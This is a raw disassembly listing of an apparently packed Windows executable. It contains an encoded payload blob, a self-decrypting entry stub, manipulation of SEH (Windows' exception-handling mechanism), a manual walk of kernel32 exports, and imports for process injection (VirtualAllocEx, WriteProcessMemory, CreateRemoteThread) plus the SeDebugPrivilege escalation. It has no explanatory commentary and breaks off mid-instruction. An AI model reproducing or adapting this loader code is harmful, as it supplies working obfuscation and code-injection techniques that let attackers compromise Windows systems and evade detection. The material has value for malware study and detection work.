dd 0DC90010Bh, 0E31B4087h, 5609C659h, 86C56CEBh, 22303A09h
dd 2CEF56F0h, 0A6299EC4h, 0D720B160h, 30F50895h, 0E0DD74B2h
dd 4F726DC6h, 0A58BFC67h, 80CCA0DBh, 9C8AC81h, 4200B8BCh
dd 0C5890C6Ch, 993011D0h, 0D64F369Ah, 30E15655h, 2444C70Eh
dd 34567820h, 11DF8B12h, 810A5038h, 7A103056h, 0D2338087h
dd 540104B2h, 68182414h, 8BC3120Dh, 0B8750AFFh, 91AB100Ah
dd 0F4147914h, 140D58A5h, 10E0881h, 0C944B0C0h, 68834CB1h
dd 5CB3DB54h, 0A3ADC7D4h, 2D13101h, 3303E832h, 36047402h
dd 9E37057Ch, 95269B0h, 34524A4Eh, 0B762C918h, 0C534A154h
dd 0D2CABF98h, 0BF024885h, 4B0728DBh, 3F4E5245h, 1272EFF6h
dd 244CB670h, 4601C6Ah, 0C6041F6Fh, 0FF210958h, 25051C20h
dd 2A8159E3h, 56089108h, 5D0A3864h, 5F08C422h, 23060422h
dd 0B00B2819h, 1C7B0811h, 0E883E00Ch, 0EE05E00Eh, 28FCE00Fh
dd 38B41220h, 8E32131Fh, 5922BC09h, 47530723h, 4FFA0419h
dd 101C8CDAh, 1D04A124h, 0FB209EC0h, 27CDCAC1h, 662263C0h
dd 293D392Ah, 401B09DEh, 97083C11h, 5A994533h, 0D5C0938h
dd 0B85D0813h, 859A4D3h, 0B15FF18Eh, 0D0F0811h, 182C1502h
dd 0C87AE060h, 28B78409h, 6164BEC8h, 7930C169h, 9D76C07Bh
dd 85EA08C8h, 637C9FC8h, 23308E1h, 80070610h, 3B030201h
dd 0C8F20605h, 2EB00411h, 0B0281810h, 17205192h, 9F01007h
dd 0C0B0Ah, 100F0E0Dh, 14131211h, 17161500h, 1B1A1918h
dd 1E1D041Ch, 0ABA6471Fh, 56092419h, 5F265E12h, 0BF025AA5h
dd 0D0F7FC45h, 0C3D80962h, 18126875h, 900923AFh, 38E8A2C0h
dd 2385E0C1h, 0A2C09012h, 0D05714C8h, 0CA36D109h, 8A25F4F8h
dd 0B8199E0Fh, 25B106DEh, 0AC08112h, 0E044E821h, 1085C828h
dd 39D8A2F0h, 6D6CBCF7h, 0D6F0605h, 85B10387h, 0C0B60F0Ah
dd 0CDBE0933h, 94E0CF72h, 24E851D8h, 0FE58107h, 904AC0Ah
dd 0AC28A444h, 8D5148F3h, 79A28057h, 14364053h, 0C809C08Bh
dd 0A2B5103h, 0B443321h, 10852328h, 70874385h, 9806668h
dd 2BA2F06Eh, 88334214h, 0A23510Bh, 0D0148069h, 1018159h
dd 464B4320h, 0F5314544h, 0F50D79DFh, 0EA134702h, 90029441h
dd 4D45392Ah, 3C66503Ah, 496D1142h, 0FDCB5014h, 0B36E2039h
dd 71EE9603h, 0B0303252h
dd 39310A02h, 3F12AD35h, 0BE552EBBh, 9EDC50ADh, 6B49EED6h
dd 285D1E43h, 94CF1F7Fh, 19332918h, 0F76E3379h, 39EE96CFh
dd 0F71609B2h, 0E6DD31FAh, 120E8ABDh, 0CCC7DD61h, 2EBF0234h
dd 3F02644Dh, 251C4524h, 7FFC9A73h, 45425067h, 5D04005Eh
dd 2EB8A88h, 9F11C91Ch, 0AD4008E8h, 60294810h, 39C02402h
dd 212931h, 1091119h, 222A323Ah, 0A121A00h, 2B333B02h
dd 131B0023h, 343C030Bh, 3F00242Ch, 1F272F37h, 70F17h
dd 262E363Eh, 60E161Eh, 2D353D05h, 8D801D25h, 3F141C05h
dd 1107040Ch, 0A701180Bh, 60FB003h, 17320A15h, 0C01A2013h
dd 1B0771h, 29020D14h, 2F251F34h, 281E3701h, 30212D33h
dd 38F3042Bh, 2A428122h, 20187032h, 588260ACh, 0C0544008h
dd 28303840h, 0C218202Ch, 80488821h, 146C3252h, 0C9205884h
dd 0D9CB64D3h, 4DCF36CDh, 0D36493D1h, 0D732D5D9h, 378E5C68h
dd 0E70CB728h, 170F9011h, 1230051Ah, 1808F21Fh, 1B20000Eh
dd 0D130903h, 1600061Eh, 2819040Bh, 103008h, 20401838h
dd 0F2F0727h, 3F173700h, 2E06261Fh, 1636000Eh, 5251E3Eh
dd 35000D2Dh, 241D3D15h, 0C2C04h, 1C3C1434h, 0B2B0323h
dd 3B133300h, 2A02221Bh, 1232000Ah, 1211A3Ah, 310B0929h
dd 28193911h, 7A30116h, 0D040E05h, 80B3890h, 60A0503h
dd 0AF09050Ch, 50B34C10h, 28D90224h, 41FE0B1Fh, 74F70828h
dd 2F1FD44h, 19285EF2h, 0BC054807h, 60B07F3Eh, 0AAE7EF83h
dd 810E12EBh, 0ED0F0D76h, 18B6E308h, 6A0726CCh, 7A0EB80Ch
dd 0D2EFED0Ah, 0EB5860Fh, 987C618h, 0FFF5620Bh, 0E4C99DAFh
dd 1ECD0C08h, 0C7EBD403h, 35FB9DEFh, 1118A204h, 0DC090E5Fh
dd 2280F688h, 7CDB01F4h, 0D82E6852h, 854E3782h, 3AF85A06h
dd 0B7BC820Dh, 0E9BEB6F8h, 2FCC103h, 660AA043h, 0EC0DAC9Ah
dd 3EA524D0h, 0BC03360Fh, 6DFFF328h, 0A8AA2310h, 46D5D63h
dd 0B7FF2CC1h, 9007860Dh, 0C1B758EDh, 0F6900D38h, 34B0A8A8h
dd 0D6CF1B5Eh, 4C5A5C6Ch, 5FB4F509h, 68EB1A48h, 1B97CD0Ah
dd 346D7C06h, 0DECB60B4h, 0B0075525h, 0CC1BEA04h, 0F7FC7FD0h
dd 9510C044h, 0FED07C83h, 0BE426FA8h, 6016CB2h, 0B8D9C90Dh
dd 0CBB70388h, 0C17EFD36h, 0EE6920Dh, 0DCAA165Fh, 0B709DA81h
dd 0B5FAC858h, 8CD0031Ah, 0F30CEFEDh, 6804D743h, 3F81D0EFh
dd 0E9B83D6Dh, 0F0EEBE0Eh, 0B604EFA1h, 0CC1144E0h, 0A7C0992h
dd 0F6A6DDAh, 3FBA75DCh, 2E0C2403h, 9BF58020h, 0FE7D0D42h
dd 5C9CDB0h, 6F1EBCD5h, 5507CF28h, 0BF8741A1h, 3D4556Ch
dd 622A0B8Ch, 55E1E009h, 6062269Ch, 0BAE0454h, 55605483h
dd 45BBA301h, 446F654h, 0F20849A8h, 0E07B3A6Fh, 0E03F1CE4h
dd 53474B49h, 23400E21h, 1142524h, 0CC10F8BBh, 1F0FFC06h
dd 3A253039h, 3C8B3B85h, 3EA73D91h, 3FE23FD4h, 313A0EE8h
dd 3B3A5F40h, 3DEF3CC3h, 0EFB3EF4h, 4E103209h, 0CF3C8E28h
dd 4F570F43h, 0CF758F67h, 0E0CCBFCh, 8E3C4E97h, 0F53CF4Ch
dd 8F674F5Eh, 0CF7FCF78h, 0CFABCF85h, 0CFBECFB7h, 0CFEACFE3h
dd 3404C7F6h, 8E404EFEh, 0F56CF47h, 8F754F6Eh, 0CFA0CF93h
dd 0CFB2CFA7h, 0CFC7CFBBh, 0CFEECFCEh, 0CFF9CFF3h, 3508C3FEh
dd 0A34E9312h, 0C384B35Bh, 0E39DD394h, 0F3B8F3A6h, 0F3C5F3C0h
dd 0F3E6F3CBh, 3665F0F6h, 0E89FE47Dh, 0F0F3ECE0h, 3337392Bh
dd 463B403Ah, 7D3D4C3Ch, 0A63F9A3Eh, 0BE3FB13Fh, 0D23FC93Fh
dd 0F73FDD3Fh, 34380F0Eh, 5B8E554Eh, 7B0F75CFh, 0A38F9D4Fh
dd 0DBCFD5CFh, 0FECFF8CFh, 3E3925C3h, 65A34C93h, 7EC374B3h
dd 0ABE39DD3h, 0D5F3BEF3h, 923A0AF0h, 3B00FDE4h, 3E313DEDh
dd 0E4623F18h, 0F43FE9C1h, 0FCA8789Ah, 1D1C30A9h, 5E9D2531h
dd 3D8EDA1Dh, 0F79DDC32h, 0E533C807h, 6A360621h, 0DDD1C9C9h
dd 723720D8h, 76657460h, 0F84787Fh, 392F38D6h, 1D3D9DBCh
dd 0B5469941h, 0F958F152h, 0F96CF962h, 3C81F875h, 9A748D72h
dd 0E278A876h, 0E43EDF1Ch, 0C3F0287h, 34471627h, 54874B67h
dd 66C75AA7h, 71E76CE7h, 8AE77EE7h, 0D9E78FE7h, 0EEE7E2E7h
dd 29B5F9E4h, 2822D428h, 5C7A3A78h, 987E617Ch, 5D316507h
dd 9E279332h, 0A0B8AA45h, 0D0EEB3Dh, 684E5833h, 43D9968Eh
dd 1C069850h, 7237740Fh, 76CA7479h, 38081CE9h, 3E2687AAh
dd 46E527B8h, 60668C1Eh, 1C398830h, 9D75304Dh, 4E38127Fh
dd 0F58E5CACh, 4F321EC3h, 22A0A693h, 94924833h, 34848463h
dd 0A33C9323h, 0C26BB354h, 0CF744883h, 1CE47235h, 9D71365Ch
dd 83F91DE5h, 39D43712h, 3A0321B7h, 0D115C90Eh, 0E147D91Ah
dd 0F0E3E986h, 64723B38h, 0A8767F74h, 0EC7AD178h, 633C201Ch
dd 6F1D6A9Dh, 0BD1E9C9Eh, 753D1A87h, 749A927h, 3A81F236h
dd 9BC9653Eh, 19D8F0D1h, 744D723Fh, 52967691h, 7020CCDEh
dd 3F016C20h, 74F23009h, 78BD7694h, 314C1CF1h, 127E9D73h
dd 4A4E548Ah, 5D33500Eh, 0AA83624Eh, 0BE93B434h, 0D2B3C8A3h
dd 0F4D3DCC3h, 1EF0FDE3h, 30E42435h, 59EC4DE8h, 7CF470F0h
dd 0A8FC93F8h, 0F492BFFCh, 0F97EF47Eh, 1B360D1Ch, 5B1D2A9Dh
dd 951E7B9Eh, 804FB592h, 379EC0D4h, 0E42E3824h, 0EC3DE833h
dd 0F4EFF042h, 0FCFFF8FAh, 21393904h, 3C24263Ah, 0BD809E88h
dd 9D463A9Ch, 9E5F1D4Fh, 9F731E6Eh, 9F871F82h, 9F9B9F96h
dd 9FB09FAAh, 87C39FB9h, 27723B26h, 3CF44183h, 3D81CBFAh
dd 0D10CC906h, 0E118D912h, 0F124E91Eh, 0F930F92Ah, 0F93CF936h
dd 0F948F942h, 0F954F94Eh, 0F960F95Ah, 0F96CF966h, 0F978F972h
dd 0F984F97Eh, 0F990F98Ah, 0F99CF996h, 0F9A8F9A2h, 0F9B4F9AEh
dd 0F9C0F9BAh, 0F9CCF9C6h, 0F9D8F9D2h, 0F9E4F9DEh, 0F9F0F9EAh
dd 0F8FCF9F6h, 8723E02h, 14760E74h, 207A1A78h, 2C7E9690h
dd 387E327Eh, 0CF4402CFh, 0CF50CF4Ah, 0CF5CCF56h, 0EF68CF62h
dd 0CF74CF6Eh, 0CF80CF7Ah, 0CF8CCF86h, 0CF98CF92h, 0CFA4CF9Eh
dd 0CFB0CFAAh, 0CFBCCFB6h, 0CFC8CFC2h, 0CFD4CFCEh, 0CFE0CFDAh
dd 0CFECCFE6h, 0CFF8CFF2h, 3F04C3FEh, 6910920Ah, 22E11C42h
dd 2EF128E9h, 0FC3A4A34h, 0FC46FC40h, 8C3BFD4Ch, 9488B44Dh
dd 74997231h, 26C676C1h, 16163579h, 0D6084ECEh, 0DE0FDACFh
dd 0E68FE24Fh, 0EECFEACFh, 0F6CFF2CFh, 0FECFFACFh, 63802C3h
dd 0EA30A93h, 16C312B3h, 1EE31AD3h, 3C6322F2h, 4C492AF2h
dd 0FA36F932h, 243EED41h, 4AFC4650h, 52FC4EFCh, 5AFC56FCh
dd 62FC5EFCh, 6AFC66FCh, 72FC6EFCh, 7AFC76FCh, 82FC7EFCh
dd 8AFC86FCh, 92FC8EFCh, 9AFC96FCh, 0A2FC9EFCh, 809AA6FCh
dd 0B27EAE7Eh, 0BA7EB67Eh, 0C27EBE7Eh, 0CA7EC67Eh, 0D27ECE7Eh
dd 0DA7E1AB0h, 0E27EDE7Eh, 0EA7EE67Eh, 0F27EEE7Eh, 4CA8F649h
dd 39020E82h, 68165206h, 0FB4BAAECh, 4A5FE74Fh, 529DCE0Ah
dd 9A9E761Dh, 0A5CBE16h, 0E428A019h, 30063187h, 473C272Ah
dd 856C675Ah, 9980D37Eh, 4469ACF2h, 0F9E4F9D1h, 3151F8F5h
dd 9F547872h, 14F0EDE6h, 3A3B3239h, 7E893B62h, 0D7F4C1F0h
dd 0F3FCECF8h, 333907FCh, 46E87F1Dh, 71F05CECh, 34390AF4h
dd 3B7C3A61h, 3DB53C9Ah, 35210ECAh, 8E5A4E3Ch, 0F8ACF75h
dd 87FC4FE1h, 4EFE361Ah, 0CFA18E4Ah, 4FDA0FBCh, 270F8BF5h
dd 0A2478746h, 3492C064h, 682049E9h, 0A391E853h, 0C3BDB3AFh
dd 0E2EDD3D8h, 412CEA57h, 0ACD99E50h, 0DCE9C7E1h, 723AE260h
dd 4D6F7454h, 0B63D4E8Dh
dd 1D0ED03Eh, 0BD4E3F3Bh, 0E6CFCB8Eh, 123C0403h, 42A32D93h
dd 0B1C38FB3h, 44692ED2h, 831C6457h, 0B3F49EF0h, 223EE8A0h
dd 84BD9FE4h, 0CC92C8E8h, 2630FE0Fh, 0E49314F6h, 10F5B020h
dd 0E51F3011h, 0EC58EC60h, 0F481F066h, 27310E6Ah, 2443FF32h
dd 6E934933h, 0E4C479A2h, 34CCD04Ah, 80305C77h, 3532E903h
dd 0DB926C33h, 3D124050h, 2283CC34h, 3647F86Fh, 0E8C4E450h
dd 0FEBEA9CDh, 72374EE8h, 49D1748Bh, 0BA50C00Dh, 9253EC48h
dd 0B06549B4h, 9B248D3Fh, 40C59294h, 7B398272h, 9A9A8E3Dh
dd 283E0D1Ch, 5E1D439Dh, 8D13789Eh, 0CAC36E4Fh, 0B0A692D6h
dd 739D551Ch, 0A494971Dh, 44E02094h, 3039BA3Ch, 314512CDh
dd 8E81640Eh, 0FA4CF93h, 83E64FD4h, 9355324Dh, 0B797A373h
dd 407009EFh, 1C3607B0h, 84C637B1h, 0D079386Bh, 2390E0Ah
dd 3E993C0Eh, 0F0125CF3h, 0C082CC65h, 34B0E002h, 4C72E498h
dd 2D0D2836h, 609FE839h, 2FD44401h, 3A143996h, 3C313B29h
dd 80562E3Bh, 8C9F869Fh, 0AE9FA19Fh, 0E49FCD9Fh, 0AB87F19Fh
dd 3C21B336h, 3E349838h, 391CECE7h, 5A487039h, 0CC3B1E0Bh
dd 0F63E6A83h, 48F2AC48h, 88108DDCh, 0F30702CDh, 64934F30h
dd 90B379A3h, 9CD396C3h, 181CA2E3h, 75976C31h, 0F89504Fh
dd 8F954F8Fh, 0CFB4CFA3h, 0CFC2CFBCh, 0C9D6CFC8h, 0F59A61E7h
dd 0F2B81A0Ch, 2E129C94h, 0C4239EC4h, 0F361F35Bh, 0F380F36Fh
dd 0F38EF388h, 0F3A2F394h, 69BBF2B3h, 0D5F9C738h, 0EEF9E6F9h
dd 0FAF9F4F9h, 723308F8h, 76217419h, 0AA2D5427h, 0FC54F84Ch
dd 9260FC5Ah, 7E7F7E8Eh, 548D7E87h, 0FCB2B493h, 0FCC0FCBAh
dd 96D4FCC6h, 9FED1F08h, 87F99FF3h, 27183407h, 67264720h
dd 0A43A872Ch, 260FAA4Bh, 0CF5FCF59h, 0CF7ECF6Dh, 0C98CCF86h
dd 0B1DA6192h, 0BFF9B9F9h, 0D3F9C5F9h, 0F1F9E9F9h, 0E474F7F9h
dd 8C354C0Bh, 2F3B293Ah, 0D3430265h, 67F361E8h, 7BF36DF3h
dd 99FB91F3h, 0A5F39FF3h, 0C9F3B3F3h, 0D7F3D1F3h, 0EBF3DDF3h
dd 93601F0h, 15E89C98h, 60F123ECh, 20F9412Fh, 944DF2h
dd 0FC7BD827h, 0FC85FC7Fh, 90A9FC93h, 0FCB7FC88h, 0FCCBFCBDh
dd 0FCE9FCE1h, 1C0A9AEFh, 9D193703h, 9E271D21h, 9F3B1E2Dh
dd 92591F51h, 73A0C35Fh, 91F389F3h, 9DF397F3h, 0C1F2ABF3h
dd 0CF7E1C70h, 0E37ED57Eh, 11CF97Eh, 32A60738h, 319E1B1Dh
dd 3F9F391Eh, 364F4513h, 0CF71CF69h, 0CF7DCF77h, 0C9A1CF8Bh
dd 0B5FEA7A9h, 0D9E7C3E7h, 9694E1E4h, 0F5FB04C3h, 1FC959E1h
dd 33D925D1h, 51E949E1h, 5D14C1F2h, 81F96BF9h, 8FF989F9h
dd 0A3F995F9h, 0C1F9B9F9h, 0FCCD1E64h, 96F1FCDBh, 87FF1F3Eh
dd 27133A05h, 67314729h, 0A73D8737h, 0E561C74Bh, 75349369h
dd 99F383F3h, 0A7F3A1F3h, 0BBF3ADF3h, 0D9F3D1F3h, 0E5F3DFF3h
dd 9F0F3F3h, 17E4113Bh, 2B4A60E9h, 49F441F0h, 55FC4FF8h
dd 79FC63FCh, 87FC81FCh, 9BFC8DFCh, 0BAFCB1FCh, 109AC3FCh
dd 0DB7ED57Eh, 0E97EE27Eh, 20E0F07Eh, 1C6C4482h, 9D0A3004h
dd 9E161D10h, 9F221E1Ch, 90412528h, 0E8309140h, 7131610Eh
dd 12A79149h, 0A79D8799h, 0E7A5C7A1h, 0E7ADE7A9h, 0E7B5E7B1h
dd 0A0BDE4B9h, 0C9FCC51Ch, 0D1FCCDFCh, 0D9FCD5FCh, 0E1FCDDFCh
dd 5CB0E5FCh, 0F14D48B2h, 3FF93F30h, 32010EFDh, 360E5305h
dd 0F11CF0Dh, 8F194F15h, 0CF21CF1Dh, 0CF29CF25h, 0F31CB2Dh
dd 0CF39CF80h, 0CF41CF3Dh, 0A449C945h, 4ED3514Ch, 695DF259h
dd 69F96550h, 71F96DF9h, 793FF83Ch, 813F7D3Fh, 9F8E852Eh
dd 9F919F8Dh, 9F999F95h, 9FA19F9Dh, 9FA99FA5h, 9FB19FADh
dd 93B99FB5h, 0C56E4FBDh, 0CDCFC9CFh, 74A7D1C9h, 0E1DDE7D9h
dd 3C483744h, 3C503BBCh, 398A4854h, 3B233A1Fh, 252B3C27h
dd 0FFD48F2Fh, 0CB1C4EA4h, 0D31DCF9Dh, 544FD792h, 0CFE38FDFh
dd 0CFEBCFE7h, 0D2F3CFEFh, 0E808EC94h, 1C3EA484h, 1D4B9D47h
dd 16539E4Fh, 5F288357h, 4A6963F2h, 0F37F136Bh, 0F387F383h
dd 708FF28Bh, 4D977E40h, 0A33F569Bh, 0AB3FA73Fh, 9F5CAF26h
dd 83BB93B7h, 0D3F2CF50h, 0F9DB6269h, 89E3F9DFh, 254F3884h
dd 28A057FCh, 0F863F45Fh, 0D860FD67h, 9A73FC6Fh, 7E7B7E08h
dd 4D837E7Fh, 8F3F0E87h, 972E933Fh, 839F964Ch, 0ABF2A744h
dd 0FB171A6Bh, 2C300190h, 0E4E83DE0h, 0BAF4E8ECh, 4B9072E4h
dd 0B0C60F94h, 86E1B409h, 2CD0F9BCh, 25D83FBEh, 0DBC081DCh
dd 0E3C9DF3Fh, 0EBD9E7D1h, 0F3E9EFE1h, 0D062F7F1h, 2E7A022h
dd 26B8491Eh, 0BA50E428h, 26049436h, 9F421FDEh, 9F4E9F46h
dd 82569252h, 12505EF4h, 6E7E6A7Eh, 764A727Eh, 0CF82FE0Fh
dd 0CB8ACF86h, 9AF8278Eh, 0FA939EE5h, 0F3AEF3A6h, 0F5B6F3B2h
dd 0F3BEAAC3h, 0F3CAF3C6h, 0F3D2F3CEh, 0D8DEF2D6h, 7EE67E9Ch
dd 7EEE7EEAh, 5CFA7EF6h, 311C8AFEh, 1D0E9D06h, 1E169E12h
dd 1F1E9F1Ah, 0A52A9F26h, 36F3A9C3h, 42F23EF3h, 0D09F0E67h
dd 0DC9FD89Fh, 0E89FE49Fh, 0CEC3F096h, 8E0BF7FCh, 8E0C4E04h
dd 0F18CF14h, 8F244F20h, 0A738CB2Ch, 0C0E7403Ch, 0D8B1C4E5h
dd 0E50433C0h, 0EC0C2270h, 0F424F020h, 0FC2CF828h, 0FC34FC30h
dd 4B26BA50h, 0B6E1658h, 9C416428h, 0F970F96Ch, 0F994F990h
dd 0F99CF998h, 0C42A74A0h, 0CCFCC8FCh, 0F4FCF0FCh, 0FCFCF8FCh
dd 23460CCh, 1E78B438h, 0AC441E40h, 9D831CC4h, 0AF8B1D87h
dd 0C0D6FF17h
db 0
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_402150+B�o
off_41F1DE dd offset dword_403000 ; DATA XREF: .text:loc_401F77�o
; .text:00401F8B�r ...
align 4
db 2 dup(0)
dword_41F1E6 dd 330000h ; .text:00401F96�r ...
word_41F1EA dw 7865h ; DATA XREF: .text:00401FC6�o
dd 726F6C70h, 652E7265h
db 78h, 65h, 0
byte_41F1F7 db 47h ; DATA XREF: sub_402062+45�o
dd 61626F6Ch, 43315C6Ch, 5055504Bh
db 50h, 0
aGlobal2gjkgsjq db 'Global\2gjkgsjqgq',0 ; DATA XREF: sub_402510+5E�o
dword_41F218 dd 0 ; .text:00401FFD�r ...
dword_41F21C dd 0 ; .text:00401FF7�r ...
dword_41F220 dd 0 ; .text:00401FDA�r ...
dword_41F224 dd 0 ; .text:00401FA1�r ...
dword_41F228 dd 94h ; .text:00401F3E�o
dd 5, 1, 0A28h
dword_41F238 dd 2 dd 76726553h, 20656369h, 6B636150h, 3220h, 1Ch dup(0)
dword_41F2BC dd 18h, 41F2CCh, 3, 41F2D9h, 6E72656Bh, 32336C65h, 6C6C642Eh
; DATA XREF: .text:00401F19�o
dd 76646100h, 33697061h, 6C642E32h
db 6Ch, 0
off_41F2E6 dd offset aCreatetoolhelp ; DATA XREF: .text:00401F14�o
; sub_4024A0+10�o
; "CreateToolhelp32Snapshot"
dd offset aProcess32first ; "Process32First"
dd offset aProcess32next ; "Process32Next"
dd offset aVirtualalloc_0 ; "VirtualAlloc"
dd offset aOpenprocess ; "OpenProcess"
dd offset aVirtualallocex ; "VirtualAllocEx"
dd offset aCreateremoteth ; "CreateRemoteThread"
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F3h
dd 0F3D60041h, 0F3E30041h, 0F3EF0041h, 0F3FB0041h, 0F4070041h
dd 0F4190041h, 0F4290041h, 0F4370041h, 0F4410041h, 0F4540041h
dd 0F4620041h, 0F4720041h, 0F4850041h, 0F4910041h, 0F49D0041h
dd 0F4A60041h, 0F4B70041h, 0F4CD0041h, 0F4DE0041h
db 41h, 0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: .data:off_41F2E6�o
aProcess32first db 'Process32First',0 ; DATA XREF: .data:0041F2EA�o
aProcess32next db 'Process32Next',0 ; DATA XREF: .data:0041F2EE�o
aVirtualalloc_0 db 'VirtualAlloc',0 ; DATA XREF: .data:0041F2F2�o
aOpenprocess db 'OpenProcess',0 ; DATA XREF: .data:0041F2F6�o
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: .data:0041F2FA�o
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: .data:0041F2FE�o
aWriteprocessme db 'WriteProcessMemory',0
aResumethread db 'ResumeThread',0
aClosehandle db 'CloseHandle',0
aVirtualfree_0 db 'VirtualFree',0
aExitprocess_0 db 'ExitProcess',0
aGetcurrentpr_1 db 'GetCurrentProcess',0
aGetcommandli_0 db 'GetCommandLineA',0
aGetversionex_0 db 'GetVersionExA',0
aLstrcmpia db 'lstrcmpiA',0
aCreatefilema_0 db 'CreateFileMappingA',0
aMapviewoffil_0 db 'MapViewOfFile',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aGetmodulefilen db 'GetModuleFileNameA',0
aCreatefilea db 'CreateFileA',0
aGetfilesize db 'GetFileSize',0
aReadfile db 'ReadFile',0
aGetmodulehan_0 db 'GetModuleHandleA',0
aLookupprivileg db 'LookupPrivilegeValueA',0
aOpenprocesstok db 'OpenProcessToken',0
aAdjusttokenpri db 'AdjustTokenPrivileges',0
dword_41F4F4 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_4022E0+26�r ...
dword_41F4F8 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_4022E0+53�r ...
dword_41F4FC dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_4024A0+16�o
dword_41F500 dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_41F504 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_41F508 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_41F50C dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_41F510 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocExdword_41F514 dd 7C81042Ch ; resolved to->KERNEL32.CreateRemoteThreaddword_41F518 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_41F51C dd 7C8328F7h ; resolved to->KERNEL32.ResumeThreaddword_41F520 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_402390+63�r ...
dword_41F524 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_41F528 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_41F52C dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_41F530 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_41F534 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_41F538 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_41F53C dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingA ; sub_402510+6E�r
dword_41F540 dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFile ; sub_402510+82�r
dword_41F544 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFile ; sub_402510+124�r
dword_41F548 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_41F54C dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_41F550 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_41F554 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_41F558 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_41F55C dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueAdword_41F560 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_41F564 dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivileges dd offset dword_402710+8
dd offset dword_402710+2
dd 24h dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_41F616
call sub_41F658
mov ebp, fs:0
lea ebp, [ebp+8]
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41F616 proc near ; CODE XREF: start+3�p
sub ebx, ebx
sub ecx, ecx
mov cl, 95h
loc_41F61C: ; CODE XREF: sub_41F616+7�j
inc ebx
loop loc_41F61C
call $+5
pop edx
add edx, 41h
push edx
sub edi, edi
or edi, 243Ch
loc_41F634: ; CODE XREF: sub_41F616+30�j
xchg al, [edx]
sub ax, bx
xchg al, [edx]
add edx, 1
add bx, 8Ch
dec edi
or edi, edi
jnz short loc_41F634
pop edx
mov esp, fs:0
pop dword ptr fs:0
leave
jmp edx
sub_41F616 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41F658 proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_41F658 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_41F6B1
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_41F6A8
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_41F6B0
; ---------------------------------------------------------------------------
loc_41F6A8: ; CODE XREF: .data:0041F699�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_41F6B0: ; CODE XREF: .data:0041F6A6�j
pop ebx
loc_41F6B1: ; CODE XREF: .data:0041F682�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 1E36Ch
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 0
rep movsb
loc_41F6D8: ; CODE XREF: .data:0041F6F4�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_41F6EE
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_41F6F6
loc_41F6EE: ; CODE XREF: .data:0041F6DF�j
sub ebx, 100h
jnz short loc_41F6D8
loc_41F6F6: ; CODE XREF: .data:0041F6EC�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_41F704: ; CODE XREF: .data:loc_41F72B�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_41F72B
cmp dword ptr [eax+3], 636F7250h
jnz short loc_41F72B
cmp dword ptr [eax+7], 72646441h
jnz short loc_41F72B
cmp dword ptr [eax+0Bh], 737365h
jz short loc_41F730
loc_41F72B: ; CODE XREF: .data:0041F70E�j
; .data:0041F717�j ...
loop loc_41F704
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41F730: ; CODE XREF: .data:0041F729�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_41F756+2
inc ebx
insb
outsd
jnb short near ptr loc_41F7B4+2
dec eax
popa
outsb
db 64h
insb
loc_41F756: ; CODE XREF: .data:0041F747�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
